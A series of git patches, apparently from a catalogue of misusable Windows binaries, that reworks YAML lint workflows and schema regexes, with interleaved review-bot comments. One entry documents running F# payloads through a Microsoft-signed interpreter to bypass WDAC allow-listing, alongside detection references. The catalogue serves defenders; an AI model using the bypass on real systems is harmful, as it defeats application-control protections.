C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + 
Handle: '@nickvangilder' diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 35cc6c3..0a81660 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml 
@@ -1,34 +1,34 @@ ---- -Name: FsiAnyCpu.exe -Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsianycpu.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. 
+Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' From 43b48f57acd3c625fb6e76c485b8614972fba93e Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 12:58:54 -0400 Subject: [PATCH 50/60] Making final changes to workflows. --- .github/workflows/yaml-lint-reviewdog.yml | 27 ++++++++++++++++++----- .github/workflows/yaml-linting.yml | 2 +- 2 files changed, 23 insertions(+), 6 deletions(-) diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml index 3cd1dd7..ef3ba33 100644 --- a/.github/workflows/yaml-lint-reviewdog.yml +++ b/.github/workflows/yaml-lint-reviewdog.yml 
@@ -1,9 +1,6 @@
 ---
-name: YAML Lint with reviewdog
-on:
- pull_request:
- branches:
- - master
+name: PULL_REQUEST: YAML Lint with Reviewdog & Schema Checks
+on: [pull_request]
 
 jobs:
 lintFiles:
@@ -15,3 +12,23 @@ jobs:
 with:
 reporter: github-pr-review # Change reporter.
 yamllint_flags: '--config-file .github/.yamllint'
+ - name: Validate OSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSBinaries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSLibraries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSLibraries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSScripts YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSScripts/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OtherMSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OtherMSBinaries/*.yml
+ schema: YML-Schema.yml
diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index 5782c37..1f0eec8 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@@ -1,5 +1,5 @@
 ---
-name: YAML Lint and Validation Push Check
+name: PUSH: YAML Lint and Schema Validation Checks
 on: [push]
 
 jobs:
From 9aaa4903e93fec90b1ed889993d6f5454145e5cf Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:02:20 -0400 Subject: [PATCH 51/60] Fixing issue with colons.
---
 .github/workflows/yaml-lint-reviewdog.yml | 2 +-
 .github/workflows/yaml-linting.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml
index ef3ba33..b38f5ce 100644
--- a/.github/workflows/yaml-lint-reviewdog.yml
+++ b/.github/workflows/yaml-lint-reviewdog.yml
@@ -1,5 +1,5 @@
 ---
-name: PULL_REQUEST: YAML Lint with Reviewdog & Schema Checks
+name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
 on: [pull_request]
 
 jobs:
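Review bot: The four new steps run `cketti/action-pykwalify@v0.3-temp-fix`, a mutable tag on a personal fork, inside a workflow triggered by `pull_request`; whoever controls that tag can change the code executed on every PR, with whatever permissions the job's GITHUB_TOKEN carries. Pin third-party actions to a full commit SHA and keep the tag as a comment, e.g. `uses: cketti/action-pykwalify@<40-hex commit SHA>  # v0.3-temp-fix`, and do the same for the other `uses:` lines in this file. Since the four steps differ only in the directory, one `files:` glob over `yml/*/*.yml` or a `strategy.matrix` over the four directories would avoid maintaining the pin four times — check that the action's `files` input accepts it. The `lintFiles` job's head is above this hunk.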
diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index 1f0eec8..cf3a72e 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@@ -1,5 +1,5 @@
 ---
-name: PUSH: YAML Lint and Schema Validation Checks
+name: PUSH - YAML Lint and Schema Validation Checks
 on: [push]
 
 jobs:
From 9712ff088acc05b88d1bf180d71855b27b4dd053 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:16:56 -0400 Subject: [PATCH 52/60] Adding path to reviewdog yamllint
---
 .github/workflows/yaml-lint-reviewdog.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml
index b38f5ce..59dbab8 100644
--- a/.github/workflows/yaml-lint-reviewdog.yml
+++ b/.github/workflows/yaml-lint-reviewdog.yml
@@ -11,7 +11,7 @@ jobs:
 uses: reviewdog/action-yamllint@v1
 with:
 reporter: github-pr-review # Change reporter.
- yamllint_flags: '--config-file .github/.yamllint'
+ yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
 - name: Validate OSBinaries YAML Schema
 uses: cketti/action-pykwalify@v0.3-temp-fix
 with:
From e10341af15bda2d4fa2f98557084b3d76d414710 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 13:20:35 -0400 Subject: [PATCH 53/60] Setting level to error for reviewdog linting.
---
 .github/workflows/yaml-lint-reviewdog.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml
index 59dbab8..500f25c 100644
--- a/.github/workflows/yaml-lint-reviewdog.yml
+++ b/.github/workflows/yaml-lint-reviewdog.yml
@@ -10,6 +10,7 @@ jobs:
 - name: Run yamllint
 uses: reviewdog/action-yamllint@v1
 with:
+ level: error
 reporter: github-pr-review # Change reporter.
 yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
 - name: Validate OSBinaries YAML Schema
From 396cd47710320adf4077db71881f53a8f8d11b5a Mon Sep 17 00:00:00 2001
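Review bot: `yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'` relies on the action's shell expanding `**`; without `globstar` it degrades to `*`, and if the flags reach yamllint unexpanded it is handed a literal path that does not exist. yamllint recurses into directories on its own, so `yamllint_flags: '--config-file .github/.yamllint yml/'` lints every file under `yml/` however the input is passed. PATCH 54 below drops this action as "does not appear to work", which is consistent with the path never being expanded.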
From: xenoscr Date: Sun, 11 Sep 2022 13:25:58 -0400 Subject: [PATCH 54/60] Removing reviewdog yamllint that does not appear to work and falling back to normal yamllint.
---
 .github/workflows/yaml-lint-reviewdog.yml | 35 -----------------------
 .github/workflows/yaml-linting.yml | 4 +--
 2 files changed, 2 insertions(+), 37 deletions(-)
 delete mode 100644 .github/workflows/yaml-lint-reviewdog.yml
diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml
deleted file mode 100644
index 500f25c..0000000
--- a/.github/workflows/yaml-lint-reviewdog.yml
+++ /dev/null
@@ -1,35 +0,0 @@
----
-name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
-on: [pull_request]
-
-jobs:
- lintFiles:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v3
- - name: Run yamllint
- uses: reviewdog/action-yamllint@v1
- with:
- level: error
- reporter: github-pr-review # Change reporter.
- yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
- - name: Validate OSBinaries YAML Schema
- uses: cketti/action-pykwalify@v0.3-temp-fix
- with:
- files: yml/OSBinaries/*.yml
- schema: YML-Schema.yml
- - name: Validate OSLibraries YAML Schema
- uses: cketti/action-pykwalify@v0.3-temp-fix
- with:
- files: yml/OSLibraries/*.yml
- schema: YML-Schema.yml
- - name: Validate OSScripts YAML Schema
- uses: cketti/action-pykwalify@v0.3-temp-fix
- with:
- files: yml/OSScripts/*.yml
- schema: YML-Schema.yml
- - name: Validate OtherMSBinaries YAML Schema
- uses: cketti/action-pykwalify@v0.3-temp-fix
- with:
- files: yml/OtherMSBinaries/*.yml
- schema: YML-Schema.yml
diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml
index cf3a72e..70d7678 100644
--- a/.github/workflows/yaml-linting.yml
+++ b/.github/workflows/yaml-linting.yml
@@ -1,6 +1,6 @@
 ---
-name: PUSH - YAML Lint and Schema Validation Checks
-on: [push]
+name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
+on: [push,pull_request]
 
 jobs:
 lintFiles:
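Review bot: `on: [push,pull_request]` lacks the space after the comma that yamllint's default `commas` rule reports, which is awkward in the workflow that enforces yamllint (unless `.github/.yamllint` relaxes it; that file is not in view), and it also runs the job twice for every same-repository PR. `on: [push, pull_request]` fixes the spacing; limiting `push` to `master` via `branches` avoids the double run. Nothing in the hunk sets `permissions:`, so the lint and schema steps get the repository's default GITHUB_TOKEN scope; a top-level `permissions:` / `contents: read` is all that checkout plus linting needs. The rest of `lintFiles` is outside the hunk.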
From 92424a40def6c55a57add347c2470561db73608a Mon Sep 17 00:00:00 2001 From: xenoscr Date: Tue, 13 Sep 2022 22:51:52 -0400 Subject: [PATCH 55/60] Implimenting requested changes from PR #251 review from @wietze.
---
 .github/yaml-lint-reviewdog.yml.bak | 35 +++++++++++++++++++++++++++
 YML-Schema.yml | 15 ++++++------
 yml/OSBinaries/.AppInstaller.yml.swp | Bin 12288 -> 0 bytes
 3 files changed, 43 insertions(+), 7 deletions(-)
 create mode 100644 .github/yaml-lint-reviewdog.yml.bak
 delete mode 100644 yml/OSBinaries/.AppInstaller.yml.swp
diff --git a/.github/yaml-lint-reviewdog.yml.bak b/.github/yaml-lint-reviewdog.yml.bak
new file mode 100644
index 0000000..500f25c
--- /dev/null
+++ b/.github/yaml-lint-reviewdog.yml.bak
@@ -0,0 +1,35 @@
+---
+name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
+on: [pull_request]
+
+jobs:
+ lintFiles:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ - name: Run yamllint
+ uses: reviewdog/action-yamllint@v1
+ with:
+ level: error
+ reporter: github-pr-review # Change reporter.
+ yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
+ - name: Validate OSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSBinaries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSLibraries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSLibraries/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OSScripts YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OSScripts/*.yml
+ schema: YML-Schema.yml
+ - name: Validate OtherMSBinaries YAML Schema
+ uses: cketti/action-pykwalify@v0.3-temp-fix
+ with:
+ files: yml/OtherMSBinaries/*.yml
+ schema: YML-Schema.yml
diff --git a/YML-Schema.yml b/YML-Schema.yml
index 6c939cd..363b279 100644
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
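Review bot: `.github/yaml-lint-reviewdog.yml.bak` is the workflow deleted in PATCH 54 checked back in byte-for-byte (both sides show blob `500f25c`), so it adds nothing git history does not already keep, while leaving a copy of the unpinned `cketti/action-pykwalify@v0.3-temp-fix` reference in the repo for someone to restore by renaming. Drop the file, or if it must stay for reference, pin its `uses:` lines to commit SHAs first. The same commit removes a vim swap file, `yml/OSBinaries/.AppInstaller.yml.swp`; an ignore rule for `*.swp` and `*.bak` would keep both kinds of editor residue out of future commits.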
@@ -43,7 +43,7 @@ mapping:
 "MitreID":
 type: str
 required: true
- pattern: 'T[0-9]{4}'
+ pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
 "OperatingSystem":
 type: str
 required: true
@@ -74,19 +74,19 @@ mapping:
 type: str
 "Sigma":
 type: str
- pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Analysis":
 type: str
- pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Elastic":
 type: str
- pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Splunk":
 type: str
- pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "BlockRule":
 type: str
- pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Resources":
 type: seq
 required: false
@@ -95,7 +95,7 @@ mapping:
 mapping:
 "Link":
 type: str
- pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Acknowledgement":
 type: seq
 required: false
@@ -106,3 +106,4 @@ mapping:
 type: str
 "Handle":
 type: str
+ pattern: '^@(\w){1,15}$'
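Review bot: In the URL patterns, `[$-_@.&+]` is a character range from `$` to `_`, and that range is what admits `/`, `?`, `=`, `:` and `;` — so it must not be "tidied" into a literal hyphen — but it also admits `<`, `>`, `\` and `^`, and still rejects `#` and `~`, both legal in links. An explicit class states the intent, for instance `pattern: '^https?://[A-Za-z0-9._~:/?#\[\]@!$&()*+,;=%-]+$'`. The same literal is repeated six times; defining it once with a YAML anchor (`pattern: &url_pattern '...'`) and reusing it (`pattern: *url_pattern`) keeps the six in step, assuming pykwalify's loader resolves anchors before validating. For `Handle`, `^@(\w){1,15}$` lets Python's `re` (which pykwalify presumably uses) match any Unicode word character; `^@[A-Za-z0-9_]{1,15}$` is the alphabet every handle in the data actually uses.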
diff --git a/yml/OSBinaries/.AppInstaller.yml.swp b/yml/OSBinaries/.AppInstaller.yml.swp deleted file mode 100644 index 93cd402447f998b7fc3ec2217ffa41a78a3485f2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI2&yU+g6vt=bNGqx$aYK55s$6hvC+U*4_?0G98!6d@WJ8OHWR2}{GK%eSXU6O1 zLeKmG@IP?jPvF9(`~mz0h!b}%po(WFtEP*pMdAdSk-i#b-piYr&wF!-@&f1c;TXEj z7Qu0gknhjl3V;0i_R+JauaZz?LRRb73`u#!{(<9HbwIlma>KKgJ(`T}_2&D@a_w!J z*pvA^o>9q}vU_D_nUhBt06UhZ!! zhJYbp2p9r}fFWQA7y^cXA@IK=pz|a01aI}q{$_9P=c6n0{-c=;0YktLFa!(%L%=?&u$X(GwKJ_ zcc^bs7pM*D_Zx)#hWZjUMcqLCfw6zt@A0(S#|%Tj5HJJ`0YktLFa!(%L%SI6S`dUaKp9@0${B0AaFdBLVbO}EEYn`?IO5sHgSFPV z@@!j|Tx)E<4Ml1{4{2jpt}c}Aw%hF!$8p>5x7w|{sN)WqF(nEaGPMgg=c|-HkGJA_ zT?BQw+H(4tttt;YNJL-8 zmpqF^sq83I{-c7)ZMEV@k9>?pl~41WztBHCV48)RBZeIks@ER$z2#Jjm82=$=NNVQ zU>6m;kJWO_Ln)Mqb#uVfMvMHgC)szKuG_?WyG_S`eBAN+$| zu;se)>r>5ELT)`6h%!qA{-Udv(H>HT#c;U_F@6?wDR9bY%I;Jw2UOGLNQ5+5PIqCh%g>c`^q0dkru#Hp zv*ib~-q~O>wz^jTv^TQ`!`Y|(^U3UskC2E3eUYYkDi5&ErG`{l^q`jTS$w>!@eePb zNlr0?0nh5fmbA2Ww4JZZQAzfp@HO-$!$e`wM$2hAmfNzNR)h2ky%rJ|4<2TNypWP} vAre3oQB8Ue6AMRVAmS=v5AE@M_z>`n2@h+70yG|!(-}ha{+3%}Sr+*V_JpM> From 9515d4330105229b1128339591df910f403d01f5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Tue, 13 Sep 2022 22:58:12 -0400 Subject: [PATCH 56/60] Attempting to fixe regex --- YML-Schema.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 363b279..2188b68 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml 
@@ -74,19 +74,19 @@ mapping:
 type: str
 "Sigma":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Analysis":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Elastic":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Splunk":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "BlockRule":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Resources":
 type: seq
 required: false
@@ -95,7 +95,7 @@ mapping:
 mapping:
 "Link":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Acknowledgement":
 type: seq
 required: false
From ee68df7f26acdc636cdab770b314d965a3426efc Mon Sep 17 00:00:00 2001
From: xenoscr
Date: Tue, 13 Sep 2022 23:06:42 -0400
Subject: [PATCH 57/60] Put schema back to previous state and fixed non-compliant Link in At.yml
---
 YML-Schema.yml | 12 ++++++------
 yml/OSBinaries/At.yml | 2 +-
 2 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/YML-Schema.yml b/YML-Schema.yml
index 2188b68..363b279 100644
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
@@ -74,19 +74,19 @@ mapping:
 type: str
 "Sigma":
 type: str
- pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Analysis":
 type: str
- pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Elastic":
 type: str
- pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Splunk":
 type: str
- pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "BlockRule":
 type: str
- pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Resources":
 type: seq
 required: false
@@ -95,7 +95,7 @@ mapping:
 mapping:
 "Link":
 type: str
- pattern: '^http[s]?:\/\/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Acknowledgement":
 type: seq
 required: false
diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml
index 245153c..30df729 100644
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@@ -23,7 +23,7 @@ Detection:
 - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
 Resources:
 - Link: https://freddiebarrsmith.com/at.txt
- - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
+ - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
 - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
 Acknowledgement:
 - Person: 'Freddie Barr-Smith'
From dfb30f194f8a9c21d34d58526a54683209e035ba Mon Sep 17 00:00:00 2001
From: xenoscr
Date: Tue, 13 Sep 2022 23:37:10 -0400
Subject: [PATCH 58/60] Tweaked the Link regex to allow anchor tags and the handle regex to permit blank entries.
---
 YML-Schema.yml | 14 +++++++-------
 yml/OSBinaries/Bitsadmin.yml | 2 +-
 yml/OSBinaries/Esentutl.yml | 2 +-
 yml/OSBinaries/Ftp.yml | 2 +-
 4 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/YML-Schema.yml b/YML-Schema.yml
index 363b279..11f3409 100644
--- a/YML-Schema.yml
+++ b/YML-Schema.yml
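Review bot: Dropping ` - Escalate to System from Administrator` makes the line pass the new `Link` pattern but loses the only pointer to which section of a long page is the relevant one; the same happens to ` - slide 53` in the Bitsadmin.yml hunk at L98. The schema has no field for a link annotation, so a trailing YAML comment keeps the hint without tripping validation: `- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html  # section: Escalate to System from Administrator`.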
@@ -74,19 +74,19 @@ mapping:
 type: str
 "Sigma":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Analysis":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Elastic":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Splunk":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "BlockRule":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Resources":
 type: seq
 required: false
@@ -95,7 +95,7 @@ mapping:
 mapping:
 "Link":
 type: str
- pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
+ pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
 "Acknowledgement":
 type: seq
 required: false
@@ -106,4 +106,4 @@ mapping:
 type: str
 "Handle":
 type: str
- pattern: '^@(\w){1,15}$'
+ pattern: '^(@(\w){1,15})?$'
